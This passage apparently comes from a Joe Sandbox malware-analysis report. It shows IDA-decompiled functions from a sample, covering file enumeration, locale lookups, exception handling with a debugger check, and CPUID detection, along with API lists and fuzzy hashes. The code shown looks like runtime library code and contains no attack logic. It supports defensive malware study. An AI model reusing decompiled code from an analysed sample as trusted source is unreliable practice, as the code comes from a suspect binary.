								if(_t43 != 0) {
									FindClose(_t77);
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
							goto L21;
							L16:
							_t48 = FindNextFileW(_t77,  &_v600);
							_t41 = 0x2e;
						} while (_t48 != 0);
						_t73 =  *_t63;
						_t67 = _v608;
						_t51 =  *((intOrPtr*)(_t63 + 4)) -  *_t63 >> 2;
						if(_v608 !=  *((intOrPtr*)(_t63 + 4)) -  *_t63 >> 2) {
							E0042F880(_t63, _t75, _t77, _t73 + _t67 * 4, _t51 - _t67, 4, E00423B03);
						}
						FindClose(_t77);
					} else {
						_push(_v608);
						goto L7;
					}
				} else {
					_push(_t64);
					_t62 = 0;
					L7:
					L004240B3(_t62, _t64, _t75, _t77, _t75, _t62, _t62);
				}
				L21:
				return E0040361D(_v8 ^ _t78);
			}























                                                      0x004243f7
                                                      0x004243fe
                                                      0x00424401
                                                      0x00424404
                                                      0x0042440a
                                                      0x0042440d
                                                      0x00424415
                                                      0x00424417
                                                      0x0042442a
                                                      0x0042442f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0042442f
                                                      0x00424431
                                                      0x00424431
                                                      0x00424437
                                                      0x0042443d
                                                      0x0042445a
                                                      0x00424460
                                                      0x0042446f
                                                      0x00424471
                                                      0x00424478
                                                      0x0042448d
                                                      0x00424492
                                                      0x0042449c
                                                      0x004244ac
                                                      0x004244b2
                                                      0x004244b3
                                                      0x004244ba
                                                      0x004244d9
                                                      0x004244e8
                                                      0x004244ed
                                                      0x004244f0
                                                      0x004244f8
                                                      0x00424547
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004244fa
                                                      0x00424502
                                                      0x0042450c
                                                      0x0042450c
                                                      0x00424512
                                                      0x00424516
                                                      0x0042451c
                                                      0x00424521
                                                      0x0042453c
                                                      0x00424541
                                                      0x00424524
                                                      0x00424494
                                                      0x00424494
                                                      0x00000000
                                                      0x00424494
                                                      0x00424446
                                                      0x00424446
                                                      0x00424447
                                                      0x00424449
                                                      0x0042444c
                                                      0x00424451
                                                      0x00424553
                                                      0x00424561

                                                      APIs
                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00424487
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00424502
                                                      • FindClose.KERNEL32(00000000), ref: 00424524
                                                      • FindClose.KERNEL32(00000000), ref: 00424547
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFile$FirstNext
                                                      • String ID:
                                                      • API String ID: 1164774033-0
                                                      • Opcode ID: 9c9987b25dc83256c6c43cb26c5e96161230c8f0f3a81e5e265376e77b944e64
                                                      • Instruction ID: a2651c149064ae3b7487f9a247eeb4b3d2817cef2eeb53f8b058513d0e969e39
                                                      • Opcode Fuzzy Hash: 9c9987b25dc83256c6c43cb26c5e96161230c8f0f3a81e5e265376e77b944e64
                                                      • Instruction Fuzzy Hash: EC41C971A00239AFDB20EF64EC88AABB778EBC5305F504197E505D3144E6789E80CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004297F2 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 90%
                                                      			E004297F2(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebp;
				signed int _t50;
				int _t56;
				void* _t75;
				intOrPtr _t81;
				void* _t90;
				void* _t93;
				intOrPtr _t94;
				void* _t96;
				signed int _t114;
				signed int _t118;
				intOrPtr* _t120;
				intOrPtr* _t125;
				signed int _t128;
				void* _t130;
				signed int* _t132;
				int _t135;
				signed int _t136;
				void* _t137;
				void* _t149;

				_t50 =  *0x44b018; // 0x1989d38f
				_v8 = _t50 ^ _t136;
				_t134 = _a4;
				_t96 = E0041FEAE(__ecx, __edx, _a4);
				_t132 =  *(E0041FEAE(__ecx, __edx, _a4) + 0x34c);
				_t135 = E00429B1A(_t134);
				asm("sbb ecx, ecx");
				_t56 = GetLocaleInfoW(_t135, ( ~( *(_t96 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
				_v252 = _v252 & 0x00000000;
				if(_t56 == 0) {
					L37:
					 *_t132 = 0;
					L38:
					return E0040361D(_v8 ^ _t136);
				}
				if(E004306E1(_t132, _t135,  *((intOrPtr*)(_t96 + 0x54)),  &_v248) != 0) {
					L16:
					if(( *_t132 & 0x00000300) == 0x300) {
						L36:
						goto L38;
					}
					asm("sbb eax, eax");
					if(GetLocaleInfoW(_t135, ( ~( *(_t96 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
						goto L37;
					}
					_t75 = E004306E1(_t132, _t135,  *((intOrPtr*)(_t96 + 0x50)),  &_v248);
					if(_t75 != 0) {
						if( *(_t96 + 0x60) == 0 &&  *((intOrPtr*)(_t96 + 0x5c)) != 0 && E004306E1(_t132, _t135,  *((intOrPtr*)(_t96 + 0x50)),  &_v248) == 0) {
							_push(_t132);
							if(E00429C74(_t135, 0) == 0) {
								goto L36;
							}
							 *_t132 =  *_t132 | 0x00000100;
							L34:
							if(_t149 == 0) {
								_t132[1] = _t135;
							}
						}
						goto L36;
					}
					_t114 =  *_t132 | 0x00000200;
					 *_t132 = _t114;
					if( *(_t96 + 0x60) == _t75) {
						if( *((intOrPtr*)(_t96 + 0x5c)) == _t75) {
							goto L20;
						}
						_t125 =  *((intOrPtr*)(_t96 + 0x50));
						_v256 = _t125 + 2;
						do {
							_t81 =  *_t125;
							_t125 = _t125 + 2;
						} while (_t81 != _v252);
						if(_t125 - _v256 >> 1 !=  *((intOrPtr*)(_t96 + 0x5c))) {
							_t75 = 0;
							goto L20;
						}
						_push(_t132);
						if(E00429C74(_t135, 1) == 0) {
							goto L36;
						}
						 *_t132 =  *_t132 | 0x00000100;
						_t75 = 0;
						L21:
						_t149 = _t132[1] - _t75;
						goto L34;
					}
					L20:
					 *_t132 = _t114 | 0x00000100;
					goto L21;
				}
				asm("sbb eax, eax");
				if(GetLocaleInfoW(_t135, ( ~( *(_t96 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
					goto L37;
				}
				_t90 = E004306E1(_t132, _t135,  *((intOrPtr*)(_t96 + 0x50)),  &_v248);
				_t118 =  *_t132;
				if(_t90 != 0) {
					if((_t118 & 0x00000002) != 0) {
						goto L16;
					}
					if( *((intOrPtr*)(_t96 + 0x5c)) == 0) {
						L12:
						_t128 =  *_t132;
						if((_t128 & 0x00000001) != 0 || E00429C4F(_t135) == 0) {
							goto L16;
						} else {
							 *_t132 = _t128 | 0x00000001;
							goto L15;
						}
					}
					_t93 = E0042D97E(_t96, _t132, _t135,  *((intOrPtr*)(_t96 + 0x50)),  &_v248,  *((intOrPtr*)(_t96 + 0x5c)));
					_t137 = _t137 + 0xc;
					if(_t93 != 0) {
						goto L12;
					}
					 *_t132 =  *_t132 | 0x00000002;
					_t132[2] = _t135;
					_t120 =  *((intOrPtr*)(_t96 + 0x50));
					_t130 = _t120 + 2;
					do {
						_t94 =  *_t120;
						_t120 = _t120 + 2;
					} while (_t94 != _v252);
					if(_t120 - _t130 >> 1 ==  *((intOrPtr*)(_t96 + 0x5c))) {
						_t132[1] = _t135;
					}
				} else {
					_t132[1] = _t135;
					 *_t132 = _t118 | 0x00000304;
					L15:
					_t132[2] = _t135;
				}
			}



























                                                      0x004297fd
                                                      0x00429804
                                                      0x00429809
                                                      0x00429812
                                                      0x0042981a
                                                      0x00429829
                                                      0x00429835
                                                      0x00429846
                                                      0x0042984c
                                                      0x00429855
                                                      0x00429a2f
                                                      0x00429a31
                                                      0x00429a34
                                                      0x00429a42
                                                      0x00429a42
                                                      0x0042986e
                                                      0x00429929
                                                      0x00429934
                                                      0x00429a23
                                                      0x00000000
                                                      0x00429a2a
                                                      0x00429948
                                                      0x0042995e
                                                      0x00000000
                                                      0x00000000
                                                      0x0042996e
                                                      0x00429977
                                                      0x004299e8
                                                      0x00429a04
                                                      0x00429a13
                                                      0x00000000
                                                      0x00000000
                                                      0x00429a15
                                                      0x00429a1e
                                                      0x00429a1e
                                                      0x00429a20
                                                      0x00429a20
                                                      0x00429a1e
                                                      0x00000000
                                                      0x004299e8
                                                      0x0042997b
                                                      0x00429981
                                                      0x00429986
                                                      0x0042999b
                                                      0x00000000
                                                      0x00000000
                                                      0x0042999d
                                                      0x004299a3
                                                      0x004299a9
                                                      0x004299a9
                                                      0x004299ac
                                                      0x004299af
                                                      0x004299c3
                                                      0x004299df
                                                      0x00000000
                                                      0x004299df
                                                      0x004299c5
                                                      0x004299d3
                                                      0x00000000
                                                      0x00000000
                                                      0x004299d5
                                                      0x004299db
                                                      0x00429990
                                                      0x00429990
                                                      0x00000000
                                                      0x00429990
                                                      0x00429988
                                                      0x0042998e
                                                      0x00000000
                                                      0x0042998e
                                                      0x00429882
                                                      0x00429898
                                                      0x00000000
                                                      0x00000000
                                                      0x004298a8
                                                      0x004298af
                                                      0x004298b3
                                                      0x004298c5
                                                      0x00000000
                                                      0x00000000
                                                      0x004298cb
                                                      0x0042990f
                                                      0x0042990f
                                                      0x00429914
                                                      0x00000000
                                                      0x00429921
                                                      0x00429924
                                                      0x00000000
                                                      0x00429924
                                                      0x00429914
                                                      0x004298da
                                                      0x004298df
                                                      0x004298e4
                                                      0x00000000
                                                      0x00000000
                                                      0x004298e6
                                                      0x004298e9
                                                      0x004298ec
                                                      0x004298ef
                                                      0x004298f2
                                                      0x004298f2
                                                      0x004298f5
                                                      0x004298f8
                                                      0x00429908
                                                      0x0042990a
                                                      0x0042990a
                                                      0x004298b5
                                                      0x004298bb
                                                      0x004298be
                                                      0x00429926
                                                      0x00429926
                                                      0x00429926

                                                      APIs
                                                        • Part of subcall function 0041FEAE: GetLastError.KERNEL32(?,00000008,0042383F), ref: 0041FEB2
                                                        • Part of subcall function 0041FEAE: SetLastError.KERNEL32(00000000), ref: 0041FF54
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00429846
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00429890
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00429956
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale$ErrorLast
                                                      • String ID:
                                                      • API String ID: 661929714-0
                                                      • Opcode ID: 03a396a94a26a62fbf0d6a7a3087546b779c0d28dae8ae4e89c6c9426cccb4c2
                                                      • Instruction ID: d585bde42cffd1b38b749d0dbf3789b79ea3644f8eee0c9c7859eb7abb81663d
                                                      • Opcode Fuzzy Hash: 03a396a94a26a62fbf0d6a7a3087546b779c0d28dae8ae4e89c6c9426cccb4c2
                                                      • Instruction Fuzzy Hash: A461B671B102279FDB289F25ED82BAA73A8EF05310F50417BE905C6385EB78DD91CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041EF4A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E0041EF4A(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x44b018; // 0x1989d38f
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00403392(_t41);
					_pop(_t62);
				}
				E00403D00(_t67,  &_v804, 0, 0x50);
				E00403D00(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00403392(_t57);
				}
				return E0040361D(_v8 ^ _t70);
			}




































                                                      0x0041ef4a
                                                      0x0041ef4a
                                                      0x0041ef4a
                                                      0x0041ef4a
                                                      0x0041ef55
                                                      0x0041ef5a
                                                      0x0041ef5c
                                                      0x0041ef64
                                                      0x0041ef66
                                                      0x0041ef69
                                                      0x0041ef6e
                                                      0x0041ef6e
                                                      0x0041ef7a
                                                      0x0041ef8d
                                                      0x0041ef9b
                                                      0x0041efa1
                                                      0x0041efa7
                                                      0x0041efad
                                                      0x0041efb3
                                                      0x0041efb9
                                                      0x0041efbf
                                                      0x0041efc5
                                                      0x0041efcb
                                                      0x0041efd1
                                                      0x0041efd8
                                                      0x0041efdf
                                                      0x0041efe6
                                                      0x0041efed
                                                      0x0041eff4
                                                      0x0041effb
                                                      0x0041effc
                                                      0x0041f005
                                                      0x0041f00b
                                                      0x0041f00e
                                                      0x0041f014
                                                      0x0041f021
                                                      0x0041f02a
                                                      0x0041f033
                                                      0x0041f03c
                                                      0x0041f04a
                                                      0x0041f04c
                                                      0x0041f061
                                                      0x0041f06d
                                                      0x0041f070
                                                      0x0041f075
                                                      0x0041f082

                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0041F042
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041F04C
                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041F059
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                      • String ID:
                                                      • API String ID: 3906539128-0
                                                      • Opcode ID: 71e5640ae69c768bc03f084a787c16178dee3940296ea46c06fd7789feb1f53f
                                                      • Instruction ID: 071e4804324cb4e981b9f478341e84fbcaf1dc8b5b3b13a8e108624add0943d6
                                                      • Opcode Fuzzy Hash: 71e5640ae69c768bc03f084a787c16178dee3940296ea46c06fd7789feb1f53f
                                                      • Instruction Fuzzy Hash: DB31C674901228ABCB21DF65DC897DDBBB8BF08311F5045EAE41CA7291E7749F858F48
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040345B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E0040345B(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				signed int _t66;
				signed int _t68;
				intOrPtr _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t84;
				intOrPtr* _t86;
				signed int _t91;
				signed int _t94;

				_t84 = __edx;
				 *0x44bc24 =  *0x44bc24 & 0x00000000;
				 *0x44b010 =  *0x44b010 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v24 = _v24 & 0x00000000;
				 *0x44b010 =  *0x44b010 | 0x00000002;
				 *0x44bc24 = 1;
				_t86 =  &_v48;
				_push(1);
				asm("cpuid");
				_pop(_t73);
				 *_t86 = 0;
				 *((intOrPtr*)(_t86 + 4)) = 1;
				 *((intOrPtr*)(_t86 + 8)) = 0;
				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
				_v16 = _v48;
				_v8 = _v36 ^ 0x49656e69;
				_v12 = _v40 ^ 0x6c65746e;
				_push(1);
				asm("cpuid");
				_t75 =  &_v48;
				 *_t75 = 1;
				 *((intOrPtr*)(_t75 + 4)) = _t73;
				 *((intOrPtr*)(_t75 + 8)) = 0;
				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
					L9:
					_t91 =  *0x44bc28; // 0x2
					L10:
					_v32 = _v36;
					_t59 = _v40;
					_v8 = _t59;
					_v28 = _t59;
					if(_v16 >= 7) {
						_t65 = 7;
						_push(_t75);
						asm("cpuid");
						_t77 =  &_v48;
						 *_t77 = _t65;
						 *((intOrPtr*)(_t77 + 4)) = _t75;
						 *((intOrPtr*)(_t77 + 8)) = 0;
						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
						_t66 = _v44;
						_v24 = _t66;
						_t59 = _v8;
						if((_t66 & 0x00000200) != 0) {
							 *0x44bc28 = _t91 | 0x00000002;
						}
					}
					if((_t59 & 0x00100000) != 0) {
						 *0x44b010 =  *0x44b010 | 0x00000004;
						 *0x44bc24 = 2;
						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
							asm("xgetbv");
							_v20 = _t59;
							_v16 = _t84;
							if((_v20 & 0x00000006) == 6 && 0 == 0) {
								_t62 =  *0x44b010; // 0x2f
								_t63 = _t62 | 0x00000008;
								 *0x44bc24 = 3;
								 *0x44b010 = _t63;
								if((_v24 & 0x00000020) != 0) {
									 *0x44bc24 = 5;
									 *0x44b010 = _t63 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t68 = _v48 & 0x0fff3ff0;
				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
					_t94 =  *0x44bc28; // 0x2
					_t91 = _t94 | 0x00000001;
					 *0x44bc28 = _t91;
					goto L10;
				} else {
					goto L9;
				}
			}



























                                                      0x0040345b
                                                      0x0040345e
                                                      0x0040346c
                                                      0x0040347b
                                                      0x004035f8
                                                      0x004035fe
                                                      0x004035fe
                                                      0x00403481
                                                      0x00403487
                                                      0x00403492
                                                      0x00403498
                                                      0x0040349b
                                                      0x0040349c
                                                      0x004034a0
                                                      0x004034a1
                                                      0x004034a3
                                                      0x004034a6
                                                      0x004034ab
                                                      0x004034b4
                                                      0x004034c5
                                                      0x004034d0
                                                      0x004034d6
                                                      0x004034d7
                                                      0x004034df
                                                      0x004034e5
                                                      0x004034e7
                                                      0x004034ea
                                                      0x004034ed
                                                      0x004034f0
                                                      0x00403535
                                                      0x00403535
                                                      0x0040353b
                                                      0x00403542
                                                      0x00403545
                                                      0x00403548
                                                      0x0040354b
                                                      0x0040354e
                                                      0x00403552
                                                      0x00403555
                                                      0x00403556
                                                      0x0040355b
                                                      0x0040355e
                                                      0x00403560
                                                      0x00403563
                                                      0x00403566
                                                      0x00403569
                                                      0x00403571
                                                      0x00403574
                                                      0x00403577
                                                      0x0040357c
                                                      0x0040357c
                                                      0x00403577
                                                      0x00403589
                                                      0x0040358b
                                                      0x00403592
                                                      0x004035a1
                                                      0x004035ac
                                                      0x004035af
                                                      0x004035b2
                                                      0x004035c3
                                                      0x004035c9
                                                      0x004035ce
                                                      0x004035d1
                                                      0x004035df
                                                      0x004035e4
                                                      0x004035e9
                                                      0x004035f3
                                                      0x004035f3
                                                      0x004035e4
                                                      0x004035c3
                                                      0x004035a1
                                                      0x00000000
                                                      0x00403589
                                                      0x004034f5
                                                      0x004034ff
                                                      0x00403524
                                                      0x0040352a
                                                      0x0040352d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00403474
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: FeaturePresentProcessor
                                                      • String ID:
                                                      • API String ID: 2325560087-3916222277
                                                      • Opcode ID: be91ae76e944463120b84647b23f7f11c6a2ccd476382f99a0f97467e4e4773e
                                                      • Instruction ID: 68eacd9ca073f0c7fbd3528cd25628eb1c34dbf2a2273a529895066f101d6811
                                                      • Opcode Fuzzy Hash: be91ae76e944463120b84647b23f7f11c6a2ccd476382f99a0f97467e4e4773e
                                                      • Instruction Fuzzy Hash: 1C515CB1D00208AFDB18CF69D9856AABBF8FB49316F14847AD415F73A0D774DA00CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00429A45 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 59%
                                                      			E00429A45(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				void* __ebp;
				signed int _t15;
				signed int _t21;
				void* _t23;
				void* _t30;
				void* _t34;
				signed int _t43;
				signed int* _t50;
				int _t53;
				signed int _t54;

				_t15 =  *0x44b018; // 0x1989d38f
				_v8 = _t15 ^ _t54;
				_t52 = _a4;
				_t34 = E0041FEAE(__ecx, __edx, _a4);
				_t50 =  *(E0041FEAE(__ecx, __edx, _a4) + 0x34c);
				_t53 = E00429B1A(_t52);
				asm("sbb ecx, ecx");
				_t21 = GetLocaleInfoW(_t53, ( ~( *(_t34 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
				if(_t21 != 0) {
					_t23 = E004306E1(_t50, _t53,  *((intOrPtr*)(_t34 + 0x50)),  &_v248);
					_t43 =  *(_t34 + 0x60);
					if(_t23 != 0) {
						if(_t43 == 0 &&  *((intOrPtr*)(_t34 + 0x5c)) != _t43) {
							_t30 = E004306E1(_t50, _t53,  *((intOrPtr*)(_t34 + 0x50)),  &_v248);
							if(_t30 == 0) {
								_push(_t50);
								_push(_t30);
								goto L9;
							}
						}
					} else {
						if(_t43 != 0) {
							L10:
							 *_t50 =  *_t50 | 0x00000004;
							_t50[1] = _t53;
							_t50[2] = _t53;
						} else {
							_push(_t50);
							_push(1);
							L9:
							_push(_t53);
							if(E00429C74() != 0) {
								goto L10;
							}
						}
					}
				} else {
					 *_t50 =  *_t50 & _t21;
				}
				return E0040361D(_v8 ^ _t54);
			}















                                                      0x00429a50
                                                      0x00429a57
                                                      0x00429a5c
                                                      0x00429a65
                                                      0x00429a6d
                                                      0x00429a7c
                                                      0x00429a88
                                                      0x00429a99
                                                      0x00429aa1
                                                      0x00429ab2
                                                      0x00429ab9
                                                      0x00429abe
                                                      0x00429acb
                                                      0x00429adc
                                                      0x00429ae5
                                                      0x00429ae7
                                                      0x00429ae8
                                                      0x00000000
                                                      0x00429ae8
                                                      0x00429ae5
                                                      0x00429ac0
                                                      0x00429ac2
                                                      0x00429af6
                                                      0x00429af6
                                                      0x00429af9
                                                      0x00429afc
                                                      0x00429ac4
                                                      0x00429ac4
                                                      0x00429ac5
                                                      0x00429ae9
                                                      0x00429ae9
                                                      0x00429af4
                                                      0x00000000
                                                      0x00000000
                                                      0x00429af4
                                                      0x00429ac2
                                                      0x00429aa3
                                                      0x00429aa3
                                                      0x00429aa5
                                                      0x00429b17

                                                      APIs
                                                        • Part of subcall function 0041FEAE: GetLastError.KERNEL32(?,00000008,0042383F), ref: 0041FEB2
                                                        • Part of subcall function 0041FEAE: SetLastError.KERNEL32(00000000), ref: 0041FF54
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00429A99
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale
                                                      • String ID:
                                                      • API String ID: 3736152602-0
                                                      • Opcode ID: 0a2dbbf624e59cefe55aaabae04af642a869d95863c29d3b2f8261a47a6ce48b
                                                      • Instruction ID: ef915eb0bd664ab9d85596fa6bf6be3c9e63372e234fd1b2892f7bbd70f010cb
                                                      • Opcode Fuzzy Hash: 0a2dbbf624e59cefe55aaabae04af642a869d95863c29d3b2f8261a47a6ce48b
                                                      • Instruction Fuzzy Hash: 8021D671600356ABDB289F2AEC81ABB77A8EF45304F10007FF905C6241EB79ED45C758
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004296CC Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E004296CC(void* __ecx, void* __edx, signed int* _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				intOrPtr* _t38;
				intOrPtr* _t41;
				signed int _t47;
				void* _t50;
				void* _t51;
				signed int* _t52;
				void* _t53;
				void* _t54;
				signed int _t62;

				_t54 = E0041FEAE(__ecx, __edx, _t53);
				_t47 = 2;
				_t38 =  *((intOrPtr*)(_t54 + 0x50));
				_t50 = _t38 + 2;
				do {
					_t26 =  *_t38;
					_t38 = _t38 + _t47;
				} while (_t26 != 0);
				_t41 =  *((intOrPtr*)(_t54 + 0x54));
				 *(_t54 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
				_t51 = _t41 + 2;
				do {
					_t29 =  *_t41;
					_t41 = _t41 + _t47;
				} while (_t29 != 0);
				_t52 = _a4;
				 *(_t54 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
				_t52[1] = 0;
				if( *(_t54 + 0x60) == 0) {
					_t47 = E004297C6( *((intOrPtr*)(_t54 + 0x50)));
				}
				 *(_t54 + 0x5c) = _t47;
				_t32 = EnumSystemLocalesW(E004297F2, 1);
				_t62 =  *_t52 & 0x00000007;
